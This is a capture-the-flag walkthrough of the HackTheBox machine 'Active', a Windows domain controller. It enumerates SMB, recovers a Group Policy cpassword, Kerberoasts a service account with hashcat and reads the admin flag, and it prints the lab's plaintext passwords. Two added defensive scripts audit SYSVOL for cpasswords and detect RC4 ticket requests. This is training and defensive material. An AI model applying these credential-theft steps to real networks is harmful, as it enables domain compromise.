Active is an easy-rated Windows machine from HackTheBox, created by eks and mrb3n. In this post, my attacking machine is 10.10.14.210 and the target IP is 10.129.38.41.
Recon
The first steps are about getting basic information about the target, by port-scanning it with nmap and following up on whatever the exposed services reveal.
Local Terminal
ping -c 1 10.129.38.41
PING 10.129.38.41 (10.129.38.41) 56(84) bytes of data.
64 bytes from 10.129.38.41: icmp_seq=1 ttl=63 time=202 ms
--- 10.129.38.41 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 202.335/202.335/202.335/0.000 ms
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 126
88/tcp open kerberos-sec syn-ack ttl 126
135/tcp open msrpc syn-ack ttl 126
139/tcp open netbios-ssn syn-ack ttl 126
389/tcp open ldap syn-ack ttl 126
445/tcp open microsoft-ds syn-ack ttl 126
464/tcp open kpasswd5 syn-ack ttl 126
593/tcp open http-rpc-epmap syn-ack ttl 126
636/tcp open ldapssl syn-ack ttl 126
3268/tcp open globalcatLDAP syn-ack ttl 126
3269/tcp open globalcatLDAPssl syn-ack ttl 126
5722/tcp open msdfsr syn-ack ttl 126
9389/tcp open adws syn-ack ttl 126
47001/tcp open winrm syn-ack ttl 126
49153/tcp open unknown syn-ack ttl 126
49154/tcp open unknown syn-ack ttl 126
49155/tcp open unknown syn-ack ttl 126
49157/tcp open unknown syn-ack ttl 126
49158/tcp open unknown syn-ack ttl 126
49162/tcp open unknown syn-ack ttl 126
49166/tcp open unknown syn-ack ttl 126
49168/tcp open unknown syn-ack ttl 126
Then we run Nmap's version detection and default scripts against each open port.
Nmap scan report for 10.129.38.41
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-26 21:17:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
49166/tcp open msrpc Microsoft Windows RPC
49168/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-08-26T21:18:39
|_ start_date: 2024-08-26T18:53:23
Quite a few open ports! That is normal for Windows, and the combination of DNS (53), Kerberos (88), LDAP (389/636) and global catalog (3268/3269), together with the "Domain: active.htb" and "Host: DC" details in the scan, tells us this host is a domain controller for active.htb. For now we are interested in the ports that carry SMB, 139 and 445, so we will use the basic tools for exploring them.
SMB Enumeration
Local Terminal
enum4linux -a 10.129.38.41
=================================( Share Enumeration on 10.129.38.41 )================
do_connect: Connection to 10.129.38.41 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.129.38.41
//10.129.38.41/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//10.129.38.41/C$ Mapping: DENIED Listing: N/A Writing: N/A
//10.129.38.41/IPC$ Mapping: OK Listing: DENIED Writing: N/A
//10.129.38.41/NETLOGON Mapping: DENIED Listing: N/A Writing: N/A
//10.129.38.41/Replication Mapping: OK Listing: OK Writing: N/A
//10.129.38.41/SYSVOL Mapping: DENIED Listing: N/A Writing: N/A
//10.129.38.41/Users Mapping: DENIED Listing: N/A Writing: N/A
The only relevant information comes from "Share Enumeration," where we list the shared resources and determine which ones are readable by the anonymous user; in this case, it is "Replication." Now we will review it using smbclient or smbmap.
Exploring Replication
With smbclient, you can explore manually, but with smbmap, you can recursively extract all the files that you have permission to read.
The Groups.xml file is a Group Policy Preferences (GPP) item that defines a local user or group change and stores the account's password in its cpassword attribute. This is valuable information because, to use the active.htb account it references, we need to decrypt that password.
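From the defensive side, the relevant check is whether any GPP preference file under SYSVOL still carries a cpassword attribute at all. The following is an added example, not code from the original post: a small auditor that walks a SYSVOL-like Policies tree, parses every GPP XML type that can hold a cpassword, and reports the file, the element and the account it names. The sample Groups.xml it writes is constructed for the demonstration, with a placeholder cpassword value and a placeholder policy GUID.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP preference files that may carry a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Attribute names the different preference types use for the account the password belongs to.
ACCOUNT_ATTRS = ("userName", "username", "runAs", "accountName")

# Constructed sample, modelled on the layout of a GPP "Local Users and Groups" item.
# The cpassword value is a placeholder, not a real encrypted password.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="PLACEHOLDER_NOT_A_REAL_CPASSWORD=" changeLogon="0"
                noChange="1" neverExpires="1" acctDisabled="0"
                userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>
"""

# Constructed benign Drives.xml with no stored credential, to show it is not reported.
SAMPLE_DRIVES_XML = """<?xml version="1.0" encoding="utf-8"?>
<Drives>
  <Drive name="H:" status="H:" image="2" changed="2018-07-18 20:50:00">
    <Properties action="U" thisDrive="NOCHANGE" allDrives="NOCHANGE"
                userName="" path="\\\\dc\\home" label="Home" letter="H"/>
  </Drive>
</Drives>
"""


def audit_gpp_preferences(sysvol_root):
    """Return one finding per cpassword attribute found in GPP XML files under sysvol_root."""
    findings = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for fname in files:
            if fname not in GPP_FILES:
                continue
            path = os.path.join(dirpath, fname)
            try:
                tree = ET.parse(path)
            except ET.ParseError as exc:
                # Unparseable preference files are reported rather than silently skipped.
                findings.append({"file": path, "error": str(exc)})
                continue
            for elem in tree.iter():
                cpw = elem.get("cpassword")
                if cpw is None:
                    continue
                account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "<unknown>")
                findings.append({
                    "file": path,
                    "element": elem.tag,
                    "account": account,
                    # An empty cpassword still means the item was authored with a password field.
                    "has_password": bool(cpw.strip()),
                })
    return findings


def build_sample_sysvol(base_dir):
    """Write the constructed samples under a SYSVOL-like Policies path and return its root."""
    policy = os.path.join(base_dir, "Policies", "{PLACEHOLDER-POLICY-GUID}", "MACHINE", "Preferences")
    os.makedirs(os.path.join(policy, "Groups"), exist_ok=True)
    os.makedirs(os.path.join(policy, "Drives"), exist_ok=True)
    with open(os.path.join(policy, "Groups", "Groups.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_GROUPS_XML)
    with open(os.path.join(policy, "Drives", "Drives.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_DRIVES_XML)
    return os.path.join(base_dir, "Policies")


def demo():
    """Build the constructed tree in a temporary directory and audit it."""
    root = build_sample_sysvol(tempfile.mkdtemp(prefix="gpp-audit-"))
    return audit_gpp_preferences(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

In a real environment the root would be the domain's `\\<domain>\SYSVOL\<domain>\Policies` path; any finding means the policy item should be removed and the referenced account's password rotated, since the encryption key for cpassword is public.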
Password Decryption
Since it is a GPP cpassword, it can be decrypted offline with a standard GPP decryption tool. Authenticating to SMB with the recovered credentials then shows what the account can reach:
[+] IP: 10.129.38.41:445 Name: 10.129.38.41 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
From this list, "Users" seems to be the most interesting... As usual, the flag is likely to be on the desktop. Keep in mind that to log in you need the account named in Groups.xml alongside the decrypted password; in this case that account is "SVC_TGS."
Within the Impacket suite, there's a script called GetUserSPNs.py that is very useful for finding users vulnerable to Kerberoasting. This attack targets Service Principal Names (SPNs) associated with user accounts in Active Directory: any authenticated domain user can request a service ticket for such an SPN, and that ticket is encrypted with the service account's password hash. Running the script with the SVC_TGS credentials (password: GPPstillStandingStrong2k18) returns such a ticket.
Now we just need to crack the hash offline. The good news is that the script outputs the data in a format compatible with Hashcat, making it easier to crack.
Local Terminal
$ hashcat -m 13100 -a 0 GetUserSPNs.out /shared/payload/rockyou.txt --force
$ hashcat -m 13100 -a 0 GetUserSPNs.out /shared/payload/rockyou.txt --force --show
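Hashcat mode 13100 only applies because the ticket came back RC4-encrypted (etype 0x17), and that is also what a defender looks for: a user account requesting RC4 service tickets for SPNs that belong to other user accounts rather than to machines. The following is an added example, not code from the original post, of that detection logic run over a constructed sample of parsed Security event 4769 (service ticket requested) records; the field names and the sample accounts, IPs and service names are assumptions made for the demonstration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType for RC4-HMAC; 0x12 is AES256

# Constructed sample of parsed event 4769 records (not real logs).
SAMPLE_4769 = [
    {"time": "2024-08-26T21:20:01", "account": "SVC_TGS@ACTIVE.HTB", "client_ip": "::ffff:10.10.14.210",
     "service": "svc_sql", "enc_type": "0x17", "status": "0x0"},
    {"time": "2024-08-26T21:20:02", "account": "SVC_TGS@ACTIVE.HTB", "client_ip": "::ffff:10.10.14.210",
     "service": "svc_legacyapp", "enc_type": "0x17", "status": "0x0"},
    # Ticket for krbtgt is a normal TGT renewal path, not a roastable SPN.
    {"time": "2024-08-26T21:20:05", "account": "SVC_TGS@ACTIVE.HTB", "client_ip": "::ffff:10.10.14.210",
     "service": "krbtgt", "enc_type": "0x12", "status": "0x0"},
    # Workstation requesting an AES ticket for the DC's machine account: benign.
    {"time": "2024-08-26T21:21:10", "account": "WS01$@ACTIVE.HTB", "client_ip": "::ffff:10.129.38.60",
     "service": "DC$", "enc_type": "0x12", "status": "0x0"},
    # A single RC4 ticket for one legacy service account: common noise, not an attack by itself.
    {"time": "2024-08-26T21:22:00", "account": "jdoe@ACTIVE.HTB", "client_ip": "::ffff:10.129.38.61",
     "service": "svc_legacyapp", "enc_type": "0x17", "status": "0x0"},
    # Failed request (KDC_ERR_S_PRINCIPAL_UNKNOWN): no ticket was issued, so nothing to crack.
    {"time": "2024-08-26T21:22:30", "account": "jdoe@ACTIVE.HTB", "client_ip": "::ffff:10.129.38.61",
     "service": "svc_sql", "enc_type": "0x17", "status": "0x7"},
]


def is_rc4_user_spn_request(ev):
    """True when a ticket was issued with RC4 for an SPN held by a user account."""
    svc = ev["service"]
    return (ev["status"] == "0x0"
            and ev["enc_type"].lower() == RC4_HMAC
            and not svc.endswith("$")          # machine accounts
            and svc.lower() != "krbtgt")       # TGT, not a service ticket target


def detect_kerberoast(events, window=timedelta(minutes=10), min_spns=2):
    """Alert per (account, client_ip) that obtains RC4 tickets for >= min_spns distinct
    user SPNs within `window`. min_spns=1 flags every RC4 user-SPN ticket, which is
    higher-fidelity only in environments that have already retired RC4."""
    grouped = defaultdict(list)
    for ev in events:
        if is_rc4_user_spn_request(ev):
            grouped[(ev["account"], ev["client_ip"])].append(
                (datetime.fromisoformat(ev["time"]), ev["service"]))

    alerts = []
    for (account, ip), reqs in grouped.items():
        reqs.sort()
        best = set()
        # Sliding window anchored on each request: largest set of distinct SPNs seen inside it.
        for i, (t0, _svc) in enumerate(reqs):
            spns = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(spns) > len(best):
                best = spns
        if len(best) >= min_spns:
            alerts.append({"account": account, "client_ip": ip, "services": sorted(best)})
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoast(SAMPLE_4769):
        print(alert)
```

With the default threshold only the requester that collected tickets for two different user SPNs is reported; lowering `min_spns` to 1 also surfaces the lone legacy request, which is the trade-off to make when deciding whether RC4 can be disabled for service accounts (or their passwords made long and random) rather than alerted on.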
Great! With the password "Ticketmaster1968," we can now check what the Administrator account has access to, which is likely everything. The next step is to access the SMB shares and extract the flag.
[+] IP: 10.129.38.41:445 Name: 10.129.38.41 Status: ADMIN!!!
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
C$ READ, WRITE Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ, WRITE Logon server share
Replication READ ONLY
SYSVOL READ, WRITE Logon server share
Users READ ONLY
With admin status confirmed, we have elevated privileges. Among the SMB shares, C$ is the root of the C: drive, so the whole file system is reachable, including the Administrator's desktop where the flag lives.
$ cd \users\administrator\desktop\
$ get root.txt
$ exit
Local Terminal
cat root.txt
ce53b45c12214816f72f7f69ae9ecce4
Alternative
With the credentials confirmed as valid, they can also be used to obtain a shell on the target rather than just reading the share. Given the password "Ticketmaster1968," you can connect over SMB or WinRM to get an interactive session.